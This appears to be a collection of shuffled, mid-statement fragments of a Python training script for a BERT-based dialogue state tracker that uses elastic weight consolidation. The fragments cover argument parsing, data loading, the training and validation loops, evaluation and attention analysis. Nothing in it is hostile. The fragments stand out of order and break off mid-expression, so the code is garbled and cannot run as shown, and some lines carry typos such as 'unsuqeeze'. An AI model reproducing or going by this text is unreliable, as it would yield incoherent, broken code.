summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if n_gpu ==", "None nb_eval_examples_prev = 0 for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if", "global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i], global_step) tr_loss += loss.item() nb_tr_examples += input_ids.size(0)", "numeric stability. Only used when fp16 set to True.\\n\" \"0 (default value): dynamic", "for input_ids, input_len, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids =", "del_list: del ptr_model[key] if n_gpu > 1: model = model.module state = model.state_dict()", "p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay':", "import BeliefTracker if args.task_name.find(\"gru\") == -1 and args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task name", "FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### # Training", "in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn dev_acc_slot += acc_slot *", "labels of Previous task target_label_list = processor.get_labels() # Slot value labels of Present", "# Note: padding idx = 0 assert len(input_ids) == max_seq_length label_id, label_info =", "(ex_index, example) in enumerate(examples): tokens_a = [x if x != '#' else '[SEP]'", "train: bert, bert-gru, bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The", "-1), args.fp16)) if args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be", "value in slot_idx.items(): if key == config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot = ':'.join(target_slot)", "to use distributed and fp16 training.\") model = DDP(model) elif n_gpu > 1:", "if summary_writer is not None: summary_writer.add_scalar(\"Epoch\", epoch, global_step) summary_writer.add_scalar(\"Train/Loss\", loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc,", "== -1 or torch.distributed.get_rank() == 0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids,", "in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)): total_acc_slot[idx] = val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss =", "\" \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased, bert-base-chinese.\") parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The", "= [] attention_draw = 5 for input_ids, input_len, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if", "\"test\", accumulation) def get_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in", "loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc else: loss_, _,", "parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total batch size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch", "acc = acc.mean() acc_slot = acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_ +", "epochs to allow no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion of training to", "result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for val", "def _hard_coding_label(label): return 'do not care' if label=='dontcare' else label def _get_label(label, label_list):", "for key, value in slot_idx.items(): if key == config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot", "else: optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer)", "len(tokens_b): tokens_a.pop() else: tokens_b.pop() ############################################################################### # Miscellaneous functions ############################################################################### def accuracy(out, labels): outputs", "torch.tensor([f.prev_label_id for f in features], dtype=torch.long) # reshape tensors to [batch, turn, word]", "[] for labels in label_list: token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device) label_token_ids.append(token_ids)", "loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if n_gpu == 1: for", "vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps = None accumulation = False if args.do_train:", "label_ids, n_gpu, target_slot=target_slot_id) loss = loss_ + args.lambda_ewc * ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc,", "input_len, label_ids, n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids,", "= sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss / nb_tr_steps if args.do_train else None result", "not None) and (prev_dialogue_idx != curr_dialogue_idx): if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding,", "utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)", "num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) > -1, 0).item() dev_loss += loss.item() * num_valid_turn dev_acc +=", "dev_acc_slot = dev_acc_slot / nb_dev_examples prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples if summary_writer is", "this will be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total input sequence length", "1: if dev_loss_slot is None: dev_loss_slot = [ l * num_valid_turn for l", "if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0)", "input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with", "is not None) and (prev_dialogue_idx != curr_dialogue_idx): if prev_turn_idx < max_turn_length: features +=", "RandomSampler, SequentialSampler from torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer from pytorch_pretrained_bert.optimization import", "del ptr_model[key] for key in rename_list: new_key = key.replace('rnn.', 'nbt.') ptr_model[new_key] = ptr_model[key]", "out_file_name) with open(output_eval_file, \"w\") as writer: logger.info(\"***** Eval results *****\") for key in", "prev_label_id # trained slots in previous tasks class DataProcessor(object): \"\"\"Base class for data", "batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total batch size for validation.\") parser.add_argument(\"--eval_batch_size\",", "class.\"\"\" return [ self.ontology[slot] for slot in self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\"", "= int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1, max_turn_length) logger.info(\"max_turn_length = %d\" % max_turn) for (ex_index,", "replaced with '[SEP]' after tokenization. text_a = line[2] + \" # \" +", "not acc == 1: dialog = [] for input, label, pred in zip(input_ids[0],", "i for i, _label in enumerate(labels)} for labels in label_list] for i, label", "if args.do_train: def get_optimizer_grouped_parameters(model): param_optimizer = [(n, p) for n, p in model.named_parameters()", "= [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)] tokens_b", "Slot value labels of Previous task target_label_list = processor.get_labels() # Slot value labels", "10%% of training.\") parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not", "loss scaling.\\n\" \"Positive power of 2: static loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether", "batch = tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, _ = batch", "in range(num_labels[i])] for i in range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids", "input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with", "any(nd in n for nd in no_decay)], 'weight_decay': 0.0, 'lr': args.learning_rate}, ] return", "'[SEP]' for x in tokenizer.tokenize(example.text_a)] tokens_b = None if example.text_b: tokens_b = [x", "logger.info(\"***** Running evaluation *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch size", "* num_valid_turn prev_dev_loss_slot = [ l * prev_num_valid_turn for l in prev_loss_slot] prev_dev_acc_slot", "[\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding =", "of slots in present task # tokenizer vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model)", "= FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0) if args.loss_scale == 0: optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)", "output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train: if n_gpu == 1: torch.save(model.state_dict(), output_model_file) else:", "for turn in dialog: text = turn['input'] + '\\t' for label, pred in", "find %s \" % vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps = None accumulation", "the train set.\"\"\" raise NotImplementedError() def get_dev_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s", "< 5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens: %s\" % \"", "turn, word] all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len = all_input_len.view(-1, max_turn_length, 2) all_label_ids", "torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank)", "all_prev_label_ids) # Run prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data,", "l * prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples +=", "acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss", "dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev) dev_sampler = SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data, sampler=dev_sampler,", "== -1: raise ValueError(\"Task name should include at least \\\"gru\\\" or \\\"lstm\\\"\") elif", "else: loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_", "= [ l * prev_num_valid_turn for l in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot *", "summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid", "slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim) return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels,", "\" \"E.g., 0.1 = 10%% of training.\") parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter for EWC\")", "= label_ids.size(2) for slot in range(nslot): for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot]", "run eval on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run analysis on", "args.do_train: logger.info(\"Training...\") global_step = 0 last_update = None best_loss = None #### EWC:", "= torch.load(args.load_path, map_location=device) del_list = [] rename_list = [] for key in ptr_model.keys():", "heads in multi-headed attention\") parser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run training.\") parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether", "in multi-headed attention\") parser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run training.\") parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to", "of sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training:", "8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu()", "import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt type should be either", "slot_acc)) writer.write(\"total class accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis: %s\" % output_eval_incorr_file) print(class_correct)", "int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1, max_turn_length) logger.info(\"max_turn_length = %d\" % max_turn) for (ex_index, example)", "target_slot =[] prev_slot = [] for key, value in slot_idx.items(): if key ==", "care' if label=='dontcare' else label def _get_label(label, label_list): label_id = [] label_info =", "< max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx -", "\"dev\", accumulation) def get_test_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")),", "range(nslot): for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig", "import FP16_Optimizer from apex.optimizers import FusedAdam except ImportError: raise ImportError( \"Please install apex", "self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation) def get_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for", "lr_this_step, global_step) for param_group in optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step() optimizer.zero_grad() global_step +=", "= torch.nn.DataParallel(model) # Prepare optimizer if args.do_train: def get_optimizer_grouped_parameters(model): param_optimizer = [(n, p)", "input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot in range(0, nslot): fig,", "to the sequence length. input_ids += [0] * (max_seq_length - len(input_ids)) # Note:", "# Evaluation ############################################################################### # Test output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") # Load a trained", "required=True, help=\"nbt type: rnn or transformer or turn\" ) parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not", "label_padding assert len(label_token_ids) == max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids = torch.tensor([f[0] for f in", "/ t_total, args.warmup_proportion) if summary_writer is not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group", "or transformer or turn\" ) parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not train BERT utterance encoder\")", "val in label_list] incorrect_dialogs = [] attention_draw = 5 for input_ids, input_len, label_ids", "del_list = [] for key in ptr_model.keys(): if ('slot' in key) or ('value'", "truncated, and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int,", "not args.do_train and not args.do_eval and not args.do_analyze: raise ValueError(\"At least one of", "not any(nd in n for nd in no_decay)], 'weight_decay': 0.01, 'lr': args.learning_rate}, {'params':", "slots: ' + ', '.join(self.prev_slot)) logger.info('Processor: target slots: '+ ', '.join(self.target_slot)) def get_train_examples(self,", "acc = acc.mean() acc_slot = acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids,", "l * nb_eval_ex if eval_acc_slot is None: eval_acc_slot = acc_slot * nb_eval_ex else:", "(set_type, line[0], line[1]) # line[0]: dialogue index, line[1]: turn index if accumulation: if", "= model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot in range(0, nslot): fig, axs =", "model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if n_gpu > 1: model = torch.nn.DataParallel(model) if args.do_eval", "training.\") parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to run eval on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true',", "%d\", len(dev_examples)) logger.info(\" Batch size = %d\", args.dev_batch_size) logger.info(\" Num steps = %d\",", "training/test example for simple sequence classification.\"\"\" def __init__(self, guid, text_a, text_b=None, label=None, prev_label=None):", "parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total batch", "'nbt.') ptr_model[new_key] = ptr_model[key] del ptr_model[key] state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ##", "= None fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args) # CUDA setting if args.local_rank", "for x in input_ids])) logger.info(\"input_len: %s\" % \" \".join([str(x) for x in input_len]))", "Loss=%.6f, Validation Acc=%.6f ***\" % (last_update, best_loss, best_acc)) else: logger.info(\"*** Model NOT Updated:", "# for epoch in trange(1): #### TRAIN model.train() tr_loss = 0 nb_tr_examples, nb_tr_steps", "all_prev_label_ids = convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids", "CUDA when available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for distributed training on gpus\") parser.add_argument('--seed',", "target_slot.append(value) else: prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else: raise NotImplementedError() #", "nb_eval_ex = (label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples += nb_eval_ex nb_eval_steps += 1 def _post_process(eval_loss,", "slot_token_ids, slot_len) if n_gpu > 1: model = torch.nn.DataParallel(model) if args.do_eval and (args.local_rank", "help=\"local_rank for distributed training on gpus\") parser.add_argument('--seed', type=int, default=42, help=\"random seed for initialization\")", "checkpoints will be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model directory name') parser.add_argument(\"--target_slot\", default='',", "a data file into a list of `InputBatch`s.\"\"\" slot_dim = len(label_list) prev_slot_dim =", "max_seq_length all_padding_len = [0, 0] max_turn = 0 for (ex_index, example) in enumerate(examples):", "if n_gpu == 1: dev_acc_slot = dev_acc_slot / nb_dev_examples prev_dev_acc_slot = prev_dev_acc_slot /", "loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f, Valid prev acc=%.6f ***\" \\ % (epoch,", "prev_dev_loss += prev_loss.item() * prev_num_valid_turn prev_dev_acc += prev_acc.item() * prev_num_valid_turn if n_gpu ==", "= %d) ' % (label, label_map[i][label]) return label_id, label_info features = [] prev_dialogue_idx", "\"\"\"Gets a collection of `InputExample`s for the train set.\"\"\" raise NotImplementedError() def get_dev_examples(self,", "parser.add_argument(\"--target_slot\", default='', type=str, required=True, help=\"Target slot idx to train model. ex. '0:1:2 or", "or dev_loss < best_loss: # Save a trained model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\")", "pdb.set_trace() def draw(data, x, y, ax): seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False,", "if slot == \"pricerange\": slot = \"price range\" if idx in self.target_slot_idx: self.target_slot.append(slot)", "[\"[SEP]\"] input_len = [len(tokens), 0] if tokens_b: tokens += tokens_b + [\"[SEP]\"] input_len[1]", "max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length - prev_turn_idx", "a trained model that you have fine-tuned ptr_model = torch.load(output_model_file, map_location=device) del_list =", "seed for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help=\"Number of updates steps to accumulate before", "task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in present task #", "3) else: # Account for [CLS] and [SEP] with \"- 2\" if len(tokens_a)", "= [] prev_dialogue_idx = None all_padding = [0] * max_seq_length all_padding_len = [0,", "run training.\") parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to run eval on the test set.\") parser.add_argument(\"--do_analyze\",", "# Analyze: TODO ############################################################################### if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() ==", "else: # The symbol '#' will be replaced with '[SEP]' after tokenization. text_a", "assert len(features) % max_turn_length == 0 if prev_dialogue_idx is None or prev_turn_idx <", "[ self.ontology[slot] for slot in self.prev_slot] def _create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates examples", "\\ prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if eval_loss_slot is None:", "len(tokens_b) + 1 input_ids = tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up to the sequence length.", "gpus\") parser.add_argument('--seed', type=int, default=42, help=\"random seed for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help=\"Number of", "[0] prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss = prev_eval_loss /", "in enumerate(ontology_items): slot, value = domain if slot == \"pricerange\": slot = \"price", "(args.local_rank == -1 or torch.distributed.get_rank() == 0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len,", "= tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, prev_label_ids = batch if", "[[0 for x in range(num_labels[i])] for i in range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation)", "## Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location of the data corpus') parser.add_argument(\"--bert_model\", default=None,", "args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format( args.gradient_accumulation_steps))", "def _get_label(label, label_list): label_id = [] label_info = '' label_map = [{_label: i", "epoch: break ############################################################################### # Evaluation ############################################################################### # Test output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") #", "in present task # tokenizer vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model) if not", "loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy,", "epoch best_loss = dev_loss best_acc = dev_acc logger.info(\"*** Model Updated: Epoch=%d, Validation Loss=%.6f,", "= list(range(0, len(processor.prev_slot))) # List of slots in previous task target_slot_id = list(range(len(processor.prev_slot),", "between the training and evaluation ptr_model = torch.load(args.load_path, map_location=device) del_list = [] rename_list", "line[3] # line[3]: system response label = [ line[4+idx] for idx in self.target_slot_idx]", "acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss =", "None: summary_writer.add_scalar(\"Epoch\", epoch, global_step) summary_writer.add_scalar(\"Train/Loss\", loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step)", "None nb_eval_steps, nb_eval_examples = 0, 0 prev_eval_loss, prev_eval_accuracy = 0, 0 prev_eval_loss_slot, prev_eval_acc_slot", "default=-1, help=\"local_rank for distributed training on gpus\") parser.add_argument('--seed', type=int, default=42, help=\"random seed for", "np import torch from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed import", "help=\"Bert pre-trained model selected in the list: bert-base-uncased, \" \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased,", "> -1, 0).item() dev_loss += loss.item() * num_valid_turn dev_acc += acc.item() * num_valid_turn", "tqdm import tqdm, trange import numpy as np import torch from torch.utils.data import", "input_file, quotechar=None): \"\"\"Reads a tab separated value file.\"\"\" with open(input_file, \"r\", encoding='utf-8') as", "output_model_file) else: torch.save(model.module.state_dict(), output_model_file) last_update = epoch best_loss = dev_loss best_acc = dev_acc", "trained model that you have fine-tuned ptr_model = torch.load(output_model_file, map_location=device) del_list = []", "trange(1): #### TRAIN model.train() tr_loss = 0 nb_tr_examples, nb_tr_steps = 0, 0 for", "pdb.set_trace() if drawfig == True: #if (len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2) attn_scores", "< warmup: return x / warmup return 1.0 - x ############################################################################### # Main", "features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a, tokens_b, max_length): \"\"\"Truncates a sequence pair", "type=float, default=0, help=\"Loss scaling to improve fp16 numeric stability. Only used when fp16", "tokenizer, args.max_turn_length) logger.info(\"***** Running validation *****\") logger.info(\" Num examples = %d\", len(dev_examples)) logger.info(\"", "prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else: raise NotImplementedError() # sorting the", "training: {}, 16-bits training: {}\".format( device, n_gpu, bool(args.local_rank != -1), args.fp16)) if args.gradient_accumulation_steps", "summary_writer is not None: summary_writer.add_scalar(\"Epoch\", epoch, global_step) summary_writer.add_scalar(\"Train/Loss\", loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step)", "labels): outputs = np.argmax(out, axis=1) return np.sum(outputs == labels) def warmup_linear(x, warmup=0.002): if", "-1: raise ValueError(\"Task name should include at least \\\"gru\\\" or \\\"lstm\\\"\") elif args.nbt", "tr_loss = 0 nb_tr_examples, nb_tr_steps = 0, 0 for step, batch in enumerate(tqdm(train_dataloader,", "SummaryWriter import pdb import matplotlib.pyplot as plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s", "task self.prev_label = prev_label # trained slots in previous tasks class InputFeatures(object): \"\"\"A", "os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model) if not os.path.exists(vocab_dir): raise ValueError(\"Can't find %s \" %", "/ nb_eval_examples_prev prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot = eval_acc_slot / nb_eval_examples prev_eval_acc_slot", "will be padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension used in belief tracker\") parser.add_argument('--num_rnn_layers',", "('value' in key): del_list.append(key) for key in del_list: del ptr_model[key] if n_gpu >", "in prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for val in total_acc_slot]) } out_file_name = 'eval_results' if", "yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct = [[0 for x in range(num_labels[i])] for", "0): pdb.set_trace() def draw(data, x, y, ax): seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0,", "len(label_token_ids) == max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device)", "for labels in label_list] for i, label in enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label])", "of labels for this data set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None):", "the slots self.ontology = collections.OrderedDict(sorted(ontology.items())) # select slots to train self.target_slot = []", "base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See", "total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() ############################################################################### #", "padding idx = 0 assert len(input_ids) == max_seq_length label_id, label_info = _get_label(example.label, label_list)", "prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running training *****\") logger.info(\" Num examples = %d\",", "if not config.target_slot == 'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28',", "must be True.\") ############################################################################### # Load data ############################################################################### # Get Processor processor =", "single training/test example for simple sequence classification.\"\"\" def __init__(self, guid, text_a, text_b=None, label=None,", "+ tokens_a + [\"[SEP]\"] input_len = [len(tokens), 0] if tokens_b: tokens += tokens_b", "= [len(tokens), 0] if tokens_b: tokens += tokens_b + [\"[SEP]\"] input_len[1] = len(tokens_b)", "def _truncate_seq_pair(tokens_a, tokens_b, max_length): \"\"\"Truncates a sequence pair in place to the maximum", "setting if args.local_rank == -1 or args.no_cuda: device = torch.device(\"cuda\" if torch.cuda.is_available() and", "for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" %", "32-bit\") parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss scaling to improve fp16 numeric stability. Only used", "= %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device)", "% \" \".join([str(x) for x in input_ids])) logger.info(\"input_len: %s\" % \" \".join([str(x) for", "loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item()) for val in", "used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of RNN 